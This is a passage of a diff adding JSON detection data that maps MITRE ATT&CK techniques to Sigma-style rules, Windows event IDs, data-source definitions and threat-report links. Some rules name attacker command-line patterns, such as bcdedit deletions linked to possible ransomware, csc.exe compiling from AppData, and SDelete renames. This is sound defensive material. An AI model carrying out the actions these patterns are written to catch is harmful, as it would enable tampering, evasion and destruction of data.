"attack.credential_access", + "attack.t1212" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 675, + 4768, + 4769, + 4771 + ], + "FailureCode": [ + "0x9", + "0xA", + "0xB", + "0xF", + "0x10", + "0x11", + "0x13", + "0x14", + "0x1A", + "0x1F", + "0x21", + "0x22", + "0x23", + "0x24", + "0x26", + "0x27", + "0x28", + "0x29", + "0x2C", + "0x2D", + "0x2E", + "0x2F", + "0x31", + "0x32", + "0x3E", + "0x3F", + "0x40", + "0x41", + "0x43", + "0x44" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Faulty legacy applications" + ], + "level": "high" + }, + { + "title": "Possible Remote Password Change Through SAMR", + "id": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", + "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). \"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.", + "author": "Dimitrios Slamaris", + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "samrpipe": { + "EventID": 5145, + "RelativeTargetName": "samr" + }, + "passwordchanged": { + "EventID": 4738 + }, + "passwordchanged_filter": { + "PasswordLastSet": null + }, + "timeframe": "15s", + "condition": "( passwordchanged and not passwordchanged_filter ) | near samrpipe" + }, + "level": "medium" + }, + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1067", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Possible Ransomware or unauthorized MBR modifications", + "id": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", + "status": "experimental", + "description": "Detects, possibly, malicious unauthorized usage of bcdedit.exe", + "references": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set" + ], + "author": "@neu5ron", + "date": "2019/02/07", + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.persistence", + "attack.t1067" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "NewProcessName": "*\\bcdedit.exe", + "ProcessCommandLine": [ + "*delete*", + "*deletevalue*", + "*import*" + ] + }, + "condition": "selection" + }, + "level": "medium" + }, + [ + "API monitoring" + ], + [ + "MBR" + ], + [ + "VBR" + ], + [ + "API monitoring" + ], + [ + "MBR" + ], + [ + "VBR" + ] + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + ] + }, + { + "technique_id": "T1500", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Suspicious Csc.exe Source File Folder", + "id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", + "description": "Detects a suspicious execution of csc.exe, which uses a source in a suspicious folder (e.g. AppData)", + "status": "experimental", + "references": [ + "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/" + ], + "author": "Florian Roth", + "date": "2019/08/24", + "modified": "2019/08/31", + "tags": [ + "attack.defense_evasion", + "attack.t1500" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\csc.exe", + "CommandLine": [ + "*\\AppData\\\\*", + "*\\Windows\\Temp\\\\*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unkown" + ], + "level": "high" + } + ], + "external_reference": [ + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf" + ] + }, + { + "technique_id": "T1066", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "Secure Deletion with SDelete", + "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "status": "experimental", + "description": "Detects renaming of file while deletion with SDelete tool", + "author": "Thomas Patzke", + "references": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1107", + "attack.t1066", + "attack.s0195" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 4656, + 4663, + 4658 + ], + "ObjectName": [ + "*.AAA", + "*.ZZZ" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitime usage of SDelete" + ], + "level": "medium" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Anti-virus" + ], + [ + "B9", + "Binary file metadata" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "LOG-MD - B9", + "Binary file metadata" + ], + [ + "Anti-virus" + ] + ], + "external_reference": [ + "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf" + ] + }, + { + "technique_id": "T1200", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "USB Device Plugged", + "id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", + "description": "Detects plugged USB devices", + "references": [ + "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", + "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/" + ], + "status": "experimental", + "author": "Florian Roth", + "tags": [ + "attack.initial_access", + "attack.t1200" + ], + "logsource": { + "product": "windows", + "service": "driver-framework" + }, + "detection": { + "selection": { + "EventID": [ + 2003, + 2100, + 2102 + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administrative activity" + ], + "level": "low" + }, + [ + "Asset Management" + ], + [ + "Data loss prevention" + ], + [ + "Asset Management" + ], + [ + "Data loss prevention" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1025", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "5140/5145", + "Net Shares" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1185", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "Packet capture" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "API monitoring" + ], + [ + "Packet capture" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1092", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4657", + "Registry Monitoring ", + "USB Keys" + ], + [ + "4663", + "File monitoring" + ], + [ + "Data loss prevention" + ], + [ + "4657", + "Registry Monitoring ", + "USB Keys" + ], + [ + "4663", + "File monitoring" + ], + [ + "Data loss prevention" + ], + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive creation", + "description": "A drive was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "drive" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive access", + "description": "A drive partition was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "drive" + } + ], + "external_reference": [ + "https://www.justice.gov/file/1080281/download", + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1094", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + "https://pan-unit42.github.io/playbook_viewer/", + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1024", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Malware reverse engineering" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Malware reverse engineering" + ] + ], + "external_reference": [ + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + ] + }, + { + "technique_id": "T1132", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Network protocol analysis" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + null + ] + }, + { + "technique_id": "T1001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "FW Logs" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "FW Logs" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf", + null + ] + }, + { + "technique_id": "T1172", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ], + [ + "SSL/TLS inspection" + ], + [ + "Packet capture" + ] + ], + "external_reference": [ + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + ] + }, + { + "technique_id": "T1026", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", NaN + ] + }, + { + "technique_id": "T1188", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "Network protocol analysis" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Network protocol analysis" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + ] + }, + { + "technique_id": "T1079", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Malware reverse engineering" + ], + [ + "Packet capture" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1104", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "Network device logs" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Network device logs" + ], + [ + "Network protocol analysis" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + 